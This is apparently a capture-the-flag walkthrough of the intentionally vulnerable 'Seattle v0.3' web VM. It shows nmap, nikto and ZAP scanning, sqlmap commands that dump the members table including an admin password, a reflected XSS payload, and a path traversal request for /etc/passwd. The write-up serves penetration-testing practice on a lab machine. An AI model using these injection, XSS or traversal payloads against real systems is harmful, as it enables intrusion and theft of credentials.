Seattle: v0.3

logo

Description

Graceful’s VulnVM is web application running on a virtual machine, it’s designed to simulate a simple eCommerce style website which is purposely vulnerable to a number of well know security issues commonly seen in web applications. This is really a pre-release preview of the project but it’s certainly functional as it stands, but I’m planning on doing a lot of work on this in the near future.

The plan is ultimately to have the application vulnerable to a large number of issues with a selection of different filters at different difficulties that way the as testers become better at detecting and exploiting issues the application can get hardened against common exploitation methods to allow the testers a wider ranger of experiences.

Enumeration

nmap -p- -sV 192.168.2.17

 

nmap

Looks like the machine runs a web server.

nikto -h http://192.168.2.17

nikto

Let’s see what OWASP Zed Attack Proxy (ZAP) finds.

zap

So there is a SQL and XSS vulnerability. Let’s go for the SQL first.

SQL INJECTION

Let’s go and capture GET info and load it up in sqlmap and see what’s the name of the database.

sqlmap -r ~/Desktop/header.txt –level=5 –risk=3 –current-db

name-database

So, the name of the database is ‘seattle’. Let’s get the rest of the information.

sqlmap -r ~/Desktop/header.txt –level=5 –risk=3 -D seattle –tables

tables

sqlmap -r ~/Desktop/header.txt –level=5 –risk=3 -D seattle -T tblMembers –columns –dump

username-password

That’s nice. The username plus password of the admin.
admin@seattlesounds.net | Assasin1
Let’s log in as admin.

Unfortunately there is no way to upload a dirty php to get a reverse shell.
But let’s get some other vulnerabilities.

Cross Site Scripting

After looking at some pages, it seems there is one vulnerable for XSS.

http://192.168.2.17/blog.php?author=”><script>alert(‘Yes! XSS’)%3B<%2Fscript>

xss

Disclosure of information

http://192.168.2.17/admin/

disclosure1

Path traversal

192.168.2.17/download.php?item=../../../../etc/passwd

etc-passwd

Fun VM but too bad there wasn’t the possibility for a reverse shell.

Advertenties